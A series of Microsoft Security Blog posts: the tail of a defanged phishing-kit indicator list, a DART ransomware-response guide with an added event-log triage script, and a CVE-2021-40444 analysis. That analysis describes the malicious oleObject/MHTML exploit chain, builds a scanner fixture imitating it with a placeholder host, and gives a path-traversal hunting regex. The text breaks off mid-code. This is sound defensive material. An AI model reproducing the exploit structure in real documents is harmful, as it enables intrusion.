  • hxxps://trasactionsmtp[.]com/email-list/universalmail/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://moneysmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://moneysmtp[.]com/email-list/otlk/finish[.]php
  • hxxps://moneysmtp[.]com/hxxp://moneysmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://feesmtp[.]com/email-list/office365rd40/finish[.]php
  • hxxps://feesmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://Failedghostsmtp[.]com/email-list/sharepoint/finish[.]php
  • hxxps://bomohsmtp[.]com/email-list/office365-21/finish[.]php
  • hxxps://bomohsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://foxsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://dasmtp[.]com/email-list/dropboxoffice1/finish[.]php
  • hxxps://rosmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://ghostsmtp[.]com/email-list/adobe20/finish[.]php
  • hxxps://josmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://ghostsmtp[.]com:443/email-list/onedrive23/finish[.]php
  • hxxps://ghostsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://winsmtp[.]com/email-list/excel/finish[.]php
  • hxxps://linuxsmtp[.]com/email-list/adobe20/finish[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/office1/finish[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/onedrive23/finish[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/excel5/finish[.]php
  • hxxps://gpxsmtp[.]com/email-list/adobe3/finish[.]php
  • hxxps://gpxsmtp[.]com/email-list/office1/finish[.]php
  • hxxps://gpxsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://panelsmtp[.]com/email-list/onedrive-ar/finish[.]php
  • hxxps://mexsmtp[.]com/email-list/onedrive23/finish[.]php?phishing-processor
  • hxxps://racksmtp[.]com/email-list/domain-au1/finish[.]php
  • hxxps://racksmtp[.]com/email-list/finish[.]php
  • hxxps://racksmtp[.]com/email-list/sharepoint/finish[.]php
  • hxxps://mainsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://prvtsmtp[.]com/email-list/onedrive23/finish[.]php?i-am-a-phishing-processor
  • hxxps://prvtsmtp[.]com/email-list/onedrive23/finish[.]php?this-is-a-phishing-processor
  • hxxps://prvtsmtp[.]com/email-list/office1/finish[.]php
  • hxxps://prvtsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://apiserverdata1[.]com/email-list/office1/finish[.]php
  • hxxps://[.]php
  • hxxps://[.]php?this-is-a=phishing-processor
  • hxxps://valvadi101[.]com/email-list/office1/finish[.]php
  • hxxps://moneysmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://foxsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://bomohsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://rosmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://linuxsmtp[.]com/email-list/finish-unv2[.]php?phishing-processor
  • hxxps://voksmtp[.]com/email-list/finish-unv2[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/finish-unv2[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://[.]php
  • hxxps://[.]php
  • hxxps://Failedsendapidata[.]com/email-list/finish-unv2[.]php
  • hxxps://[.]php?phishing-processor
  • hxxps://prvtsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://
  • hxxps://apiserverdata1[.]com/email-list/finish-unv2[.]php
  • hxxps://sendapidata[.]com/email-list/finish-unv2[.]php

Password-processing domains:

  • hxxps://apidatacss[.]com
  • hxxps://apiserverdata1[.]com
  • hxxps://baller[.]top
  • hxxps://
  • hxxps://f1smtp[.]com
  • hxxps://ghostsmtp[.]com
  • hxxps://gpxsmtp[.]com
  • hxxps://gurl101[.]services
  • hxxps://hostprivate[.]us
  • hxxps://josmtp[.]com
  • hxxps://link101[.]bid
  • hxxps://linuxsmtp[.]com
  • hxxps://migration101[.]us
  • hxxps://panelsmtp[.]com
  • hxxps://racksmtp[.]com
  • hxxps://rosmtp[.]com
  • hxxps://rxasmtp[.]com
  • hxxps://thegreenmy87[.]com
  • hxxps://vitme[.]bid
  • hxxps://voksmtp[.]com
  • hxxps://winsmtp[.]com
  • hxxps://trasactionsmtp[.]com
  • hxxps://moneysmtp[.]com
  • hxxps://foxsmtp[.]com
  • hxxps://bomohsmtp[.]com
  • hxxps://webpicture[.]cc
  • hxxps://Faileduebpicture[.]cc
  • hxxps://Failedsendapidata[.]com
  • hxxps://prvtsmtp[.]com
  • hxxps://sendapidata[.]com
  • hxxps://
  • hxxps://plutosmto[.]com
  • hxxps://laptopdata[.]xyz
  • hxxps://jupitersmt[.]com
  • hxxps://earthsmtp[.]com
  • hxxps://feesmtp[.]com
  • hxxps://Failedghostsmtp[.]com
  • hxxps://dasmtp[.]com
  • hxxps://mexsmtp[.]com
  • hxxps://mainsmtp[.]com
  • hxxps://valvadi101[.]com
  • hxxps://ses-smtp[.]com


The post Catching the big fish: Analyzing a large-scale phishing-as-a-service operation appeared first on Microsoft Security Blog.

A guide to combatting human-operated ransomware: Part 1

September 20th, 2021 No comments

This blog is part one of a two-part series focused on how Microsoft DART helps customers with human-operated ransomware. For more guidance on human-operated ransomware and how to defend against these extortion-based attacks, refer to our human-operated ransomware docs page.

Microsoft’s Detection and Response Team (DART) has helped customers of all sizes, across many industries and regions, investigate and remediate human-operated ransomware for over five years. This blog aims to explain the process and execution used in our customer engagements to provide perspective on the unique issues and challenges regarding human-operated ransomware. We will also discuss how DART leverages Microsoft solutions such as Microsoft Defender for Endpoint, Microsoft Defender for Identity, and Microsoft Cloud App Security (MCAS) within customer environments while collaborating with cross-functional threat intelligence teams across Microsoft who similarly track human-operated ransomware activities and behaviors.

Human-operated ransomware is not a malicious software problem—it’s a human criminal problem. The solutions used to address commodity problems aren’t enough to prevent a threat that more closely resembles a nation-state threat actor. The attackers disable or uninstall your antivirus software before encrypting files. They locate and corrupt or delete backups before sending a ransom demand. These actions are commonly done with legitimate programs that you might already have in your environment and are not considered malicious. In criminal hands, these tools are used maliciously to carry out attacks.

Responding to the increasing threat of ransomware requires a combination of modern enterprise configuration, up-to-date security products, and the vigilance of trained security staff to detect and respond to the threats before data is lost.

Key steps in DART’s approach to conducting ransomware incident investigations

To maximize DART’s efforts to restore business continuity while simultaneously analyzing the details of the incident, a careful and thorough investigation is coordinated with remediation measures to ensure that the root cause is determined. These efforts take place as we assist and advise customers with the task of getting the organization up and running again in a secure manner.

Every effort is made to determine how the adversary gained access to the customer’s assets so that vulnerabilities can be remediated. Otherwise, it is highly likely that the same type of attack will take place again in the future. In some cases, the threat actor takes steps to “cover their tracks” and destroy evidence, so it is possible that the entire chain of events may not be evident.

The following are three key steps in our ransomware investigations:

Graphic illustrates the steps, goals, and initial questions in DART’s ransomware investigation assistance.

Figure 1. Key steps in DART’s ransomware investigations.

1. Assess the current situation

This is critical to understanding the scope of the incident and for determining the best people to assist and to plan and scope the investigation and remediation tasks. Asking these initial questions is crucial in helping us determine the situation being dealt with:

What initially made you aware of the ransomware attack?

If the initial threat was identified by IT staff (like noticing backups being deleted, antivirus (AV) alert, endpoint detection and response (EDR) alert, suspicious system changes), it is often possible to take quick decisive measures to thwart the attack, typically by disabling all inbound and outbound internet communication. This may temporarily affect business operations, but that would typically be much less impactful than an adversary deploying ransomware.

If the threat was identified by a user call to the IT helpdesk, there may be enough advance warning to take defensive measures to prevent or minimize the effects of the attack. If the threat was identified by an external entity (like law enforcement or a financial institution), it is likely that the damage is already done, and you will see evidence in your environment that the threat actor has already gained administrative control of your network. This can range from ransomware notes, locked screens, or ransom demands.

What date/time did you first learn of the incident?

Establishing the initial activity date and time is important because it helps narrow the scope of the initial triage for “quick wins.” Additional questions may include:

  • What updates were missing on that date? This is important to understand what vulnerabilities may have been exploited by the adversary.
  • What accounts were used on that date?
  • What new accounts have been created since that date?

What logs (such as AV, EDR, and VPN) are available, and is there any indication that the actor is currently accessing systems?

Logs are an indicator of suspected compromise. Follow-up questions may include:

  • Are logs being aggregated in a SIEM (like Microsoft Azure Sentinel, Splunk, ArcSight) and current? What is the retention period of this data?
  • Are there any suspected compromised systems that are experiencing unusual activity?
  • Are there any suspected compromised accounts that appear to be actively used by the adversary?
  • Is there any evidence of active command-and-control (C2) traffic in EDR, firewall, VPN, proxy, and other logs?

As part of assessing the current situation, DART may require a domain controller (DC) that was not ransomed, a recent backup of a DC, or a recent DC taken offline for maintenance/upgrades. We also ask our customers whether multifactor authentication (MFA) was required for everyone in the company and if Microsoft Azure Active Directory was used.
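The questions above are the ones DART asks during triage. As an added example that is not part of the post, here is a small Python script that answers two of them from a Security event-log export: which accounts logged on (Windows Security event 4624) on the date the incident was first noticed, and which accounts have been created (event 4720) since then, including creations chained through an account that was itself just created. The CSV and every event in it are constructed for the example; the column names follow the Security log field names and are not a particular product’s export format.

```python
"""First-triage questions answered from a Security event-log export.

Added example, not code from the DART post. Given the date the incident was
first noticed, it lists which accounts logged on that day (Windows Security
event 4624) and which accounts were created on or after it (event 4720),
including creations chained through an account that was itself just created.
The CSV and its column names are constructed for the example; they follow
the Security log field names, not a particular product's export format.
"""
import csv
import io
from datetime import date, datetime

# Constructed sample export, not real telemetry. LogonType 3 = network,
# 10 = RemoteInteractive (RDP); '-' marks fields the event does not carry.
SAMPLE_EVENTS_CSV = """\
TimeCreated,EventID,Computer,TargetUserName,SubjectUserName,LogonType,IpAddress
2021-09-01T08:02:11,4624,WS14,jdoe,-,2,-
2021-09-03T22:41:05,4624,DC01,svc_backup,-,3,10.0.5.23
2021-09-03T22:43:19,4624,DC01,svc_backup,-,10,10.0.5.23
2021-09-03T22:50:00,4720,DC01,helpdesk2,svc_backup,-,-
2021-09-04T01:10:37,4624,FS01,helpdesk2,-,10,10.0.5.23
2021-09-04T01:12:00,4720,DC01,admin_tmp,helpdesk2,-,-
2021-09-05T09:00:00,4624,WS14,jdoe,-,2,-
"""


def parse_events(csv_text: str):
    """Parse the export into dicts with typed TimeCreated and EventID."""
    rows = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        row["TimeCreated"] = datetime.fromisoformat(row["TimeCreated"])
        row["EventID"] = int(row["EventID"])
        rows.append(row)
    return rows


def accounts_used_on(events, day: date):
    """Accounts with a successful logon (4624) on `day`, with the logon
    types and source addresses seen for each."""
    used = {}
    for ev in events:
        if ev["EventID"] == 4624 and ev["TimeCreated"].date() == day:
            entry = used.setdefault(ev["TargetUserName"],
                                    {"logon_types": set(), "sources": set()})
            entry["logon_types"].add(ev["LogonType"])
            entry["sources"].add(ev["IpAddress"])
    return used


def accounts_created_since(events, day: date):
    """(new account, creating account, time) for 4720 events on/after `day`."""
    return [(ev["TargetUserName"], ev["SubjectUserName"], ev["TimeCreated"])
            for ev in events
            if ev["EventID"] == 4720 and ev["TimeCreated"].date() >= day]


def creation_chains(events, day: date):
    """Accounts created since `day` by an account that was itself created
    since `day`. A freshly made account immediately creating another is
    rarely routine administration, so these pairs deserve a close look."""
    created = {acct: creator for acct, creator, _ in accounts_created_since(events, day)}
    return [(acct, creator) for acct, creator in created.items() if creator in created]


if __name__ == "__main__":
    incident_day = date(2021, 9, 3)  # constructed: the day the attack was noticed
    evs = parse_events(SAMPLE_EVENTS_CSV)
    print("Used on", incident_day, accounts_used_on(evs, incident_day))
    print("Created since", incident_day, accounts_created_since(evs, incident_day))
    print("Creation chains", creation_chains(evs, incident_day))
```

On a real engagement the export would come from the SIEM or from the domain controllers directly, and the date filter would be widened to a window before the incident date as well, since the first sign noticed is rarely the first activity.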

2. Identify line-of-business (LOB) apps that are unavailable due to the incident

This step is critical in figuring out the quickest way to get systems back online while obtaining the evidence required.

Does the application require an identity?

  • How is authentication performed?
  • How are credentials such as certificates or secrets stored and managed?

Are tested backups of the application, configuration, and data available?

Are the contents and integrity of backups regularly verified using a restore exercise? This is particularly important after configuration management changes or version upgrades.

3. Explain the compromise recovery (CR) process

This is a follow-up engagement that may be necessary if DART determines that the control plane (typically Active Directory) has been compromised.

DART’s investigation always has a goal of providing output that feeds directly into the CR process. CR is the process by which we remove the nefarious attacker control from an environment and tactically increase security posture within a set period. CR takes place post-security breach. To learn more about CR, read the Microsoft Compromise Recovery Security Practice team’s blog CRSP: The emergency team fighting cyber attacks beside customers.

Once we have gathered the responses to the questions above, we can build a list of tasks and assign owners. A key factor in a successful incident response engagement is thorough, detailed documentation of each work item (such as the owner, status, findings, date, and time), making the compilation of findings at the end of the engagement a straightforward process.

How DART leverages Microsoft security solutions to combat human-operated ransomware

DART leverages cross-functional teams, such as internal threat intelligence teams, who track adversary activities and behaviors, customer support, and product development teams behind Microsoft products and services. DART also collaborates with other incident response vendors the customer may have engaged and will share findings whenever possible.

DART relies heavily on data for all investigations. The team uses existing deployments of Microsoft solutions, such as Defender for Endpoint, Defender for Identity, and MCAS within customer environments along with custom forensic data collection for additional analysis. If these sensors are not deployed, DART also requests that the customer deploy these to gain deeper visibility into the environment, correlate against threat intelligence sources, and enable our analysts to scale in speed and agility.

Microsoft Defender for Endpoint

Microsoft Defender for Endpoint is Microsoft’s enterprise endpoint security platform designed to help enterprise network security analysts prevent, detect, investigate, and respond to advanced threats. As shown in the image below, Defender for Endpoint can detect attacks using advanced behavioral analytics and machine learning. DART analysts use Defender for Endpoint for attacker behavioral analytics.

Screengrab from the Microsoft Defender Security Center that shows a pass-the-ticket attack alert.

Figure 2. Sample alert in Microsoft Defender for Endpoint for a pass-the-ticket attack.

DART analysts can also perform advanced hunting queries to pivot off indicators of compromise (IOCs) or search for known behavior if a threat actor group is identified.

Screengrab from the Microsoft Defender Security Center that shows advanced hunting, a query-based threat hunting tool.

Figure 3. Advanced hunting queries to locate known attacker behavior.

In Defender for Endpoint, customers have access to a real-time expert-level monitoring and analysis service by Microsoft Threat Experts for ongoing suspected actor activity. Customers can also collaborate with experts on demand for additional insights into alerts and incidents.

Screengrab from the Microsoft Defender Security Center that shows sample ransomware alerts.

Figure 4. Defender for Endpoint shows detailed ransomware activity.

Microsoft Defender for Identity

DART leverages Microsoft Defender for Identity to investigate known compromised accounts and to find potentially compromised accounts in your organization. Defender for Identity sends alerts for known malicious activity that actors often use such as DCSync attacks, remote code execution attempts, and pass-the-hash attacks. Defender for Identity enables our team to pinpoint nefarious activity and accounts to narrow down our investigation.

Screengrab of alerts in Microsoft Defender for Identity showing malicious activity related to ransomware attacks.

Figure 5. Defender for Identity sends alerts for known malicious activity related to ransomware attacks.

Microsoft Cloud App Security

MCAS allows DART analysts to detect unusual behavior across cloud apps to identify ransomware, compromised users, or rogue applications. MCAS is Microsoft’s cloud access security broker (CASB) solution that allows for monitoring of cloud services and data access in cloud services by users.

Screengrab of the Microsoft Cloud App Security dashboard showing open alerts and a sample list of users to investigate.

Figure 6. The Microsoft Cloud App Security dashboard allows DART analysts to detect unusual behavior across cloud apps.

Microsoft Secure Score

The Microsoft 365 Defender stack provides live remediation recommendations to reduce the attack surface. Microsoft Secure Score is a measurement of an organization’s security posture, with a higher number indicating more improvement actions taken. Refer to our documentation to find out more about how your organization can leverage this feature to prioritize remediation actions that are based on their environment.

Understand your business risks

Beyond the immediate risk of encrypted files, the disruption to business operations, data theft, extortion, follow-on attacks, regulatory and compliance reporting, and damage to reputation all fall outside technical controls. Microsoft DART recommends that each organization weigh these risks when determining the appropriate way to respond, based on the organization’s policies, risk appetite, and applicable regulatory requirements.

Microsoft Defender for Endpoint, Microsoft Defender for Identity, and MCAS all work seamlessly together to provide customers with enhanced visibility into the attacker’s actions within the environment and to investigate attacks. Given our vast experience and expertise in investigating countless human-operated ransomware events over the past few years, we have shared what we consider best practices.

Learn more

Want to learn more about DART? Read our past blog posts.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


Additional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions

September 17th, 2021 No comments

On September 14, 2021, Microsoft released fixes for three Elevation of Privilege (EoP) vulnerabilities and one unauthenticated Remote Code Execution (RCE) vulnerability in the Open Management Infrastructure (OMI) framework: CVE-2021-38645, CVE-2021-38649, CVE-2021-38648, and CVE-2021-38647, respectively. Open Management Infrastructure (OMI) is an open-source Web-Based Enterprise Management (WBEM) implementation for managing Linux and UNIX systems. Several Azure Virtual Machine (VM) management extensions use this framework to …


Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability

September 15th, 2021 No comments

In August, Microsoft Threat Intelligence Center (MSTIC) identified a small number of attacks (less than 10) that attempted to exploit a remote code execution vulnerability in MSHTML using specially crafted Microsoft Office documents. These attacks used the vulnerability, tracked as CVE-2021-40444, as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders. These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.

The observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document. Customers who enabled attack surface reduction rules to block Office from creating child processes are not impacted by the exploitation technique used in these attacks. While these attacks used a vulnerability to access entry point devices and run highly privileged code, the secondary actions taken by the attackers still rely on stealing credentials and moving laterally to cause organization-wide impact. This illustrates the importance of investing in attack surface reduction, credential hygiene, and lateral movement mitigations. Customers are advised to apply the security patch for CVE-2021-40444 to fully mitigate this vulnerability.

This blog details our in-depth analysis of the attacks that used the CVE-2021-40444, provides detection details and investigation guidance for Microsoft 365 Defender customers, and lists mitigation steps for hardening networks against this and similar attacks. Our colleagues at RiskIQ conducted their own analysis and coordinated with Microsoft in publishing this research.

Exploit delivery mechanism

The initial campaigns in August 2021 likely originated from emails impersonating contracts and legal agreements, where the documents themselves were hosted on file-sharing sites. The exploit document used an external oleObject relationship to embed exploitative JavaScript within MIME HTML remotely hosted content that results in (1) the download of a CAB file containing a DLL bearing an INF file extension, (2) decompression of that CAB file, and (3) execution of a function within that DLL. The DLL retrieves remotely hosted shellcode (in this instance, a custom Cobalt Strike Beacon loader) and loads it into wabmig.exe (Microsoft address import tool).

Screenshot of code showing the original exploit vector

Figure 1. The original exploit vector: an externally targeted oleObject relationship definition bearing an MHTML handler prefix pointed at an HTML file hosted on infrastructure that has similar qualities to the Cobalt Strike Beacon infrastructure that the loader’s payload communicates with.
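As an added example that is not part of the post, the following Python scanner checks a .docx for the document structure Figure 1 describes: an external relationship in the package whose target carries an mhtml: handler prefix, or any oleObject relationship whose TargetMode is External. A .docx is a zip, and its *.rels parts declare what each part links to, so the check needs nothing beyond the standard library. The sample packages are built in memory with a placeholder host (placeholder.invalid, a reserved name that never resolves) and contain no payload; the relationship type URIs are the standard Office Open XML ones.

```python
"""Scanning Office Open XML packages for external MHTML/oleObject relationships.

Added example, not code from the Microsoft post. A .docx is a zip; its
relationship parts (*.rels) declare what each part links to. This scanner
flags external relationships with an mhtml: handler prefix and any external
oleObject relationship, the structure the post attributes to the exploit
documents. The sample packages below are constructed with a placeholder host.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
HYPERLINK_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                      "relationships/hyperlink")


def suspicious_relationships(docx_bytes: bytes):
    """Return (rels part, relationship id, target) for every relationship in
    the package that is external and either uses an mhtml: prefix or is an
    oleObject relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue  # internal parts cannot reach the network
                target = rel.get("Target", "")
                is_mhtml = target.lstrip().lower().startswith("mhtml:")
                if is_mhtml or rel.get("Type") == OLE_REL_TYPE:
                    findings.append((name, rel.get("Id"), target))
    return findings


def build_sample_docx(rels_xml: str) -> bytes:
    """Minimal package with just the parts the scanner reads (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<?xml version="1.0" encoding="UTF-8"?>'
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        pkg.writestr("word/document.xml",
                     '<?xml version="1.0" encoding="UTF-8"?>'
                     '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# A normal document: internal styles part plus an ordinary external hyperlink.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{HYPERLINK_REL_TYPE}" Target="https://www.microsoft.com/" TargetMode="External"/>
</Relationships>"""

# The shape described in Figure 1: an external oleObject whose target uses the
# mhtml: handler. placeholder.invalid is a reserved name that never resolves.
SUSPICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId5" Type="{OLE_REL_TYPE}" Target="mhtml:http://placeholder.invalid/side.html" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("suspicious", SUSPICIOUS_RELS)):
        hits = suspicious_relationships(build_sample_docx(rels))
        print(f"{label}: {hits or 'no external mhtml/oleObject relationships'}")
```

Ordinary external hyperlinks are left alone, since they are common in legitimate mail attachments; an external oleObject, by contrast, has no routine reason to exist in a contract or invoice, which is why it is flagged regardless of the target prefix. A scanner like this is a triage aid at the mail gateway or in a sandbox pipeline, not a substitute for the September 2021 update or the attack surface reduction rule the post recommends.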

Content that is downloaded from an external source is tagged by the Windows operating system with a mark of the web, indicating it was downloaded from a potentially untrusted source. This invokes Protected Mode in Microsoft Office, requiring user interaction to disable it to run content such as macros. However, in this instance, when opened without a mark of the web present, the document’s payload executed immediately without user interaction – indicating the abuse of a vulnerability.

diagram showing attack chain of DEV-0413 campaign that used CVE-2021-40444

Figure 2. Attack chain of DEV-0413 campaign that used CVE-2021-40444

DEV-0413 observed exploiting CVE-2021-40444

As part of Microsoft’s ongoing commitment to tracking both nation state and cybercriminal threat actors, we refer to the unidentified threat actor as a “development group” and utilize a threat actor naming structure with a prefix of “DEV” to indicate an emerging threat group or unique activity during the tracking and investigation phases before MSTIC reaches high confidence about the origin or identity of the actor behind an operation. MSTIC tracks a large cluster of cybercriminal activity involving Cobalt Strike infrastructure under the name DEV-0365.

The infrastructure we associate with DEV-0365 has several overlaps in behavior and unique identifying characteristics of Cobalt Strike infrastructure that suggest it was created or managed by a distinct set of operators. However, the follow-on activity from this infrastructure indicates multiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware). One explanation is that DEV-0365 is involved in a form of command-and-control infrastructure as a service for cybercriminals.

Additionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 was also involved in the delivery of BazaLoader and Trickbot payloads — activity that overlaps with a group Microsoft tracks as DEV-0193. DEV-0193 activities overlap with actions tracked by Mandiant as UNC1878.

Due to the uncertainty surrounding the nature of the shared qualities of DEV-0365 infrastructure and the significant variation in malicious activity, MSTIC clustered the initial email campaign exploitation identified as CVE-2021-40444 activity separately, under DEV-0413.

The DEV-0413 campaign that used CVE-2021-40444 has been smaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure. We observed the earliest exploitation attempt of this campaign on August 18. The social engineering lure used in the campaign, initially highlighted by Mandiant, aligned with the business operations of targeted organizations, suggesting a degree of purposeful targeting. The campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted. In most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.

It is worth highlighting that while monitoring the DEV-0413 campaign, Microsoft identified active DEV-0413 infrastructure hosting CVE-2021-40444 content wherein basic security principles had not been applied. DEV-0413 did not limit the browser agents able to access the server to their malware implant or known targets, thereby permitting directory listing for their web server. In doing so, the attackers exposed their exploit to anyone who might have gained interest based on public social media discussion.

Screenshot of content of email in DEV-0413 campaign that used CVE-2021-40444

Figure 3. Content of the original DEV-0413 email lure seeking application developers

At least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack. It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.

In a later wave of DEV-0413 activity on September 1, Microsoft identified a lure change from targeting application developers to a “small claims court” legal threat.

Screenshot of another email lure used in the campaigns

Figure 4. Example of the “Small claims court” lure utilized by DEV-0413

Vulnerability usage timeline

On August 21, 2021, MSTIC observed a social media post by a Mandiant employee with experience tracking Cobalt Strike Beacon infrastructure. This post highlighted a Microsoft Word document (SHA-256: 3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf) that had been uploaded to VirusTotal on August 19, 2021. The post’s focus on this document was highlighting the custom Cobalt Strike Beacon loader and did not focus on the delivery mechanism.

MSTIC analyzed the sample and determined that an anomalous oleObject relationship in the document was targeted at an external malicious HTML resource with an MHTML handler and likely leading to abuse of an undisclosed vulnerability. MSTIC immediately engaged the Microsoft Security Response Center and work began on a mitigation and patch. During this process, MSTIC collaborated with the original finder at Mandiant to reduce the discussion of the issue publicly and avoid drawing threat actor attention to the issues until a patch was available. Mandiant partnered with MSTIC and did their own reverse engineering assessment and submitted their findings to MSRC.

On September 7, 2021, Microsoft released a security advisory for CVE-2021-40444 containing a partial workaround. As a routine in these instances, Microsoft was working to ensure that the detections described in the advisory would be in place and a patch would be available before public disclosure. During the same time, a third-party researcher reported a sample to Microsoft from the same campaign originally shared by Mandiant. This sample was publicly disclosed on September 8. We observed a rise in exploitation attempts within 24 hours.

Line graph showing volume of observed exploitation attempts

Figure 5. Graphic showing original exploitation on August 18 and attempted exploitation increasing after public disclosure

Microsoft continues to monitor the situation and work to deconflict testing from actual exploitation. Since the public disclosure, Microsoft has observed multiple threat actors, including ransomware-as-a-service affiliates, adopting publicly disclosed proof-of-concept code into their toolkits. We will continue to provide updates as we learn more.

Mitigating the attacks

Microsoft has confirmed that the following attack surface reduction rule blocks activity associated with exploitation of CVE-2021-40444 at the time of publishing:

  • Block all Office applications from creating child processes

Apply the following mitigations to reduce the impact of this threat and follow-on actions taken by attackers.

  • Apply the security updates for CVE-2021-40444. Comprehensive updates addressing the vulnerabilities used in this campaign are available through the September 2021 security updates.
  • Run the latest version of your operating systems and applications. Turn on automatic updates or deploy the latest security updates as soon as they become available.
  • Use a supported platform, such as Windows 10, to take advantage of regular security updates.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants.
  • Turn on tamper protection in Microsoft Defender for Endpoint to prevent malicious changes to security settings.
  • Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
  • Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Use device discovery to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.

Microsoft 365 Defender detection details


Microsoft Defender Antivirus detects threat components as the following malware:

Endpoint detection and response (EDR)

Alerts with the following titles in the security center can indicate threat activity on your network:

  • Possible exploitation of CVE-2021-40444 (requires Defender Antivirus as the Active AV)

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

  • Suspicious Behavior By Office Application (detects the anomalous process launches that happen in exploitation of this CVE, and other malicious behavior)
  • Suspicious use of Control Panel item

Microsoft Defender for Office 365

Signals from Microsoft Defender for Office 365 inform Microsoft 365 Defender, which correlates cross-domain threat intelligence to deliver coordinated defense, when this vulnerability is detected in a document delivered via email and detonation is enabled.

The following alerts in your portal indicate that a malicious attachment has been blocked, although these alerts are also used for many different threats:

  • Malware campaign detected and blocked
  • Malware campaign detected after delivery
  • Email messages containing malicious file removed after delivery

Advanced hunting

To locate possible exploitation activity, run the following queries.

Relative path traversal (requires Microsoft 365 Defender)

Use the following query to surface abuse of Control Panel objects (.cpl) via URL protocol handler path traversal, as used in the original attack and in public proofs of concept at the time of publishing:

// Process creations where control.exe or rundll32.exe is handed a ".cpl:" handler,
// or where any command line carries a quoted "<ext>:../.." relative path traversal
DeviceProcessEvents
| where (FileName in~("control.exe","rundll32.exe") and ProcessCommandLine has ".cpl:")
or ProcessCommandLine matches regex @'\".[a-zA-Z]{2,4}:\.\.\/\.\.'
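As an added example (not code from the original post), the same two conditions as the hunting query above, expressed in Python and run over constructed process-creation records, so the `in~` / `has` / `matches regex` semantics can be checked offline. The record fields and every sample command line are constructed for the test and do not come from the post.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Process names the hunting query matches case-insensitively (KQL `in~`).
CPL_HOSTS = {"control.exe", "rundll32.exe"}

# Same regular expression as the KQL `matches regex` clause: a double quote, any
# single character, a 2-4 letter extension, a colon, then a "../.." traversal.
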